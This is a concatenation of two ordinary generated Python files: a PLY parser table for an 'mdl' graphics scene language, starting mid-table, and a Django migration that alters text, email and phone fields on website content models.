6,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'BOX':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[11,11,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'LINE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[12,12,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'MOVE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[13,13,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SCALE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[14,14,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'ROTATE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[15,15,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'FRAMES':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[16,16,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'BASENAME':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[17,17,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'VARY':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[18,18,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SET':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[19,19,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SET_KNOBS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[20,20,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'AMBIENT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[21,21,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'CONSTANTS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[22,22,-3,-9,-10,-12
,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'LIGHT':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[23,23,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SHADING':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[24,24,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'CAMERA':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[25,25,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'GENERATE_RAYFILES':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[26,26,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-
52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'MESH':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[27,27,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE_KNOBS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[28,28,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'SAVE_COORDS':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[29,29,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TWEEN':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[30,30,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39
,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'FOCAL':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[31,31,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'WEB':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[32,32,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'TEXTURE':([0,2,3,4,5,6,8,26,32,36,38,39,40,41,53,54,57,61,65,66,68,70,71,82,84,89,101,102,103,105,109,110,113,122,123,125,129,130,132,133,134,142,147,148,149,150,152,158,160,161,162,163,164,166,168,170,171,172,173,177,181,190,192,193,],[33,33,-3,-9,-10,-12,-14,-54,-63,-8,-6,-7,-4,-5,-41,-42,-46,-52,-59,-60,-62,-11,-13,-40,-45,-55,-36,-38,-39,-47,-57,-56,-15,-35,-37,-44,-58,-61,-17,-16,-19,-43,-18,-20,-21,-23,-27,-53,-22,-24,-25,-28,-29,-31,-50,-26,-30,-33,-32,-34,-48,-49,-64,-51,]),'DOUBLE':([6,9,10,11,12,13,14,16,20,21,25,30,31,35,36,40,41,42,43,44,45,46,47,48,49,50,51,52,55,56,58,59,60,62,67,69,72,73,74,75,76,77,78,79,80,81,83,85,86,87,88,92,93,94,95,96,97,98,99,100,104,106,107,108,112,114,115,116,117,118,119,120,121,124,126,127,128,131,135,136,137,138,139,140,141,143,144,145,146,151,153,154,155,156,157,159,165,167,168,169,174,175,176,178,179,180,181,182,183,184,185,186,
187,188,189,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,-8,-4,-5,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'STRING':([7,17,37,38,39,40,41,63,90,],[39,39,39,-6,-7,-4,-5,39,39,]),'XYZ':([7,9,10,11,12,15,17,18,19,22,23,27,28,29,33,36,37,38,39,40,41,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[40,40,40,40,40,52,40,40,40,40,40,40,40,40,40,-8,40,-6,-7,-4,-5,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,]),'ID':([7,9,10,11,12,17,18,19,22,23,27,28,29,33,36,37,38,39,40,41,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[41,41,41,41,41,41,41,41,41,41,41,41,41,41,-8,41,-6,-7,-4,-5,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,]),'SHADING_TYPE':([24,],[61,]),'CO':([27,40,41,64,],[63,-4,-5,90,]),'FXN':([36,104,],[-8,125,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
    for _x, _y in zip(_v[0], _v[1]):
        if _x not in _lr_action:
            _lr_action[_x] = {}
        _lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'input':([0,2,],[1,34,]),'command':([0,2,],[2,2,]),'NUMBER':([6,9,10,11,12,13,14,16,20,21,25,30,31,35,42,43,44,45,46,47,48,49,50,51,52,55,56,58,59,60,62,67,69,72,73,74,75,76,77,78,79,80,81,83,85,86,87,88,92,93,94,95,96,97,98,99,100,104,106,107,108,112,114,115,116,117,118,119,120,121,124,126,127,128,131,135,136,137,138,139,140,141,143,144,145,146,151,153,154,155,156,157,159,165,167,168,169,174,175,176,178,179,180,181,182,183,184,185,186,187,188,189,],[35,42,44,46,48,50,51,53,57,58,62,67,68,70,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,91,92,93,94,95,96,97,98,99,100,101,102,104,105,106,107,108,112,113,114,115,116,117,118,119,121,124,126,127,128,131,133,134,135,136,137,138,139,141,142,143,144,145,146,149,150,151,152,153,154,155,156,157,158,159,162,164,165,166,167,168,169,172,174,175,176,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,]),'TEXT':([7,17,37,63,90,],[37,54,71,89,110,]),'SYMBOL':([7,9,10,11,12,17,18,19,22,23,27,28,29,33,37,63,82,89,90,91,99,101,102,110,111,113,121,133,134,149,150,152,162,164,166,172,191,],[38,43,45,47,49,38,55,56,59,60,64,65,66,69,38,38,103,109,38,111,120,122,123,129,130,132,140,147,148,160,161,163,170,171,173,177,193,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
    for _x, _y in zip(_v[0], _v[1]):
        if _x not in _lr_goto:
            _lr_goto[_x] = {}
        _lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> input","S'",1,None,None,None),
('input -> <empty>','input',0,'p_input','mdl.py',127),
('input -> command input','input',2,'p_input','mdl.py',128),
('command -> COMMENT','command',1,'p_command_comment','mdl.py',132),
('SYMBOL -> XYZ','SYMBOL',1,'p_SYMBOL','mdl.py',136),
('SYMBOL -> ID','SYMBOL',1,'p_SYMBOL','mdl.py',137),
('TEXT -> SYMBOL','TEXT',1,'p_TEXT','mdl.py',141),
('TEXT -> STRING','TEXT',1,'p_TEXT','mdl.py',142),
('NUMBER -> DOUBLE','NUMBER',1,'p_NUMBER','mdl.py',146),
('command -> POP','command',1,'p_command_stack','mdl.py',150),
('command -> PUSH','command',1,'p_command_stack','mdl.py',151),
('command -> SCREEN NUMBER NUMBER','command',3,'p_command_screen','mdl.py',155),
('command -> SCREEN','command',1,'p_command_screen','mdl.py',156),
('command -> SAVE TEXT TEXT','command',3,'p_command_save','mdl.py',163),
('command -> DISPLAY','command',1,'p_command_show','mdl.py',167),
('command -> SPHERE NUMBER NUMBER NUMBER NUMBER','command',5,'p_command_sphere','mdl.py',171),
('command -> SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_sphere','mdl.py',172),
('command -> SPHERE NUMBER NUMBER NUMBER NUMBER SYMBOL','command',6,'p_command_sphere','mdl.py',173),
('command -> SPHERE SYMBOL NUMBER NUMBER NUMBER NUMBER SYMBOL','command',7,'p_command_sphere','mdl.py',174),
('command -> TORUS NUMBER NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_torus','mdl.py',188),
('command -> TORUS NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',7,'p_command_torus','mdl.py',189),
('command -> TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_torus','mdl.py',190),
('command -> TORUS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_torus','mdl.py',191),
('command -> BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_box','mdl.py',205),
('command -> BOX NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_box','mdl.py',206),
('command -> BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_box','mdl.py',207),
('command -> BOX SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_box','mdl.py',208),
('command -> LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_line','mdl.py',222),
('command -> LINE NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',8,'p_command_line','mdl.py',223),
('command -> LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER','command',8,'p_command_line','mdl.py',224),
('command -> LINE NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_line','mdl.py',225),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_line','mdl.py',226),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',9,'p_command_line','mdl.py',227),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER','command',9,'p_command_line','mdl.py',228),
('command -> LINE SYMBOL NUMBER NUMBER NUMBER SYMBOL NUMBER NUMBER NUMBER SYMBOL','command',10,'p_command_line','mdl.py',229),
('command -> MOVE NUMBER NUMBER NUMBER SYMBOL','command',5,'p_command_move','mdl.py',250),
('command -> MOVE NUMBER NUMBER NUMBER','command',4,'p_command_move','mdl.py',251),
('command -> SCALE NUMBER NUMBER NUMBER SYMBOL','command',5,'p_command_scale','mdl.py',259),
('command -> SCALE NUMBER NUMBER NUMBER','command',4,'p_command_scale','mdl.py',260),
('command -> ROTATE XYZ NUMBER SYMBOL','command',4,'p_command_rotate','mdl.py',268),
('command -> ROTATE XYZ NUMBER','command',3,'p_command_rotate','mdl.py',269),
('command -> FRAMES NUMBER','command',2,'p_command_frames','mdl.py',277),
('command -> BASENAME TEXT','command',2,'p_command_basename','mdl.py',282),
('command -> VARY SYMBOL NUMBER NUMBER NUMBER NUMBER','command',6,'p_command_vary','mdl.py',287),
('command -> VARY SYMBOL NUMBER NUMBER FXN','command',5,'p_command_vary','mdl.py',288),
('command -> SET SYMBOL NUMBER','command',3,'p_command_knobs','mdl.py',294),
('command -> SET_KNOBS NUMBER','command',2,'p_command_knobs','mdl.py',295),
('command -> AMBIENT NUMBER NUMBER NUMBER','command',4,'p_command_ambient','mdl.py',306),
('command -> CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',11,'p_command_constants','mdl.py',312),
('command -> CONSTANTS SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',14,'p_command_constants','mdl.py',313),
('command -> LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',8,'p_command_light','mdl.py',319),
('command -> LIGHT SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER SYMBOL','command',15,'p_command_light','mdl.py',320),
('command -> SHADING SHADING_TYPE','command',2,'p_command_shading','mdl.py',329),
('command -> CAMERA NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',7,'p_command_camera','mdl.py',335),
('command -> GENERATE_RAYFILES','command',1,'p_command_generate_rayfiles','mdl.py',340),
('command -> MESH CO TEXT','command',3,'p_command_mesh','mdl.py',344),
('command -> MESH SYMBOL CO TEXT','command',4,'p_command_mesh','mdl.py',345),
('command -> MESH CO TEXT SYMBOL','command',4,'p_command_mesh','mdl.py',346),
('command -> MESH SYMBOL CO TEXT SYMBOL','command',5,'p_command_mesh','mdl.py',347),
('command -> SAVE_KNOBS SYMBOL','command',2,'p_save_knobs','mdl.py',361),
('command -> SAVE_COORDS SYMBOL','command',2,'p_save_coords','mdl.py',367),
('command -> TWEEN NUMBER NUMBER SYMBOL SYMBOL','command',5,'p_tween','mdl.py',374),
('command -> FOCAL NUMBER','command',2,'p_focal','mdl.py',379),
('command -> WEB','command',1,'p_web','mdl.py',383),
('command -> TEXTURE SYMBOL NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER NUMBER','command',14,'p_texture','mdl.py',387),
]
# --- jobs/migrations/0006_auto_20210825_1547.py (repo: zain-Z/humimp, MIT license) ---
# Generated by Django 3.0.6 on 2021-08-25 13:47
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('jobs', '0005_auto_20210813_2335'),
    ]

    operations = [
        migrations.AlterField(
            model_name='about',
            name='text_about',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='contact',
            name='email',
            field=models.EmailField(blank=True, db_index=True, default='', max_length=255, null=True, unique=True),
        ),
        migrations.AlterField(
            model_name='contact',
            name='full_name',
            field=models.CharField(blank=True, default='', max_length=200, null=True),
        ),
        migrations.AlterField(
            model_name='contact',
            name='message',
            field=models.TextField(blank=True, default='', null=True),
        ),
        migrations.AlterField(
            model_name='contact',
            name='phone',
            field=models.CharField(blank=True, default='', max_length=17, null=True, unique=True, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+999999999'. Up to 14 digits allowed.", regex='^\\+?1?\\d{9,14}$')]),
        ),
        migrations.AlterField(
            model_name='contact',
            name='subject',
            field=models.CharField(blank=True, default='', max_length=200, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='email_donate',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='facebook_link',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='instagram_link',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='location_donate',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='phone_donate',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='donate',
            name='twitter_link',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='getinvolved',
            name='text_careers_getinvolved',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='getinvolved',
            name='text_joinus_getinvolved',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='index',
            name='text_about_index',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='index',
            name='text_story_index',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='index',
            name='whatDoDetail_text',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='slider',
            name='slide_subtitle_index',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='slider',
            name='slide_title_index',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='visionmissionvalue',
            name='Vission_Mission_Value_desc1',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='visionmissionvalue',
            name='Vission_Mission_Value_desc2',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='visionmissionvalue',
            name='mission_text',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='visionmissionvalue',
            name='value_text',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='visionmissionvalue',
            name='vission_text',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc1',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc2',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc3',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
        migrations.AlterField(
            model_name='whatwearedoingdetail',
            name='whatDoDetail_desc4',
            field=models.CharField(blank=True, default='', max_length=300, null=True),
        ),
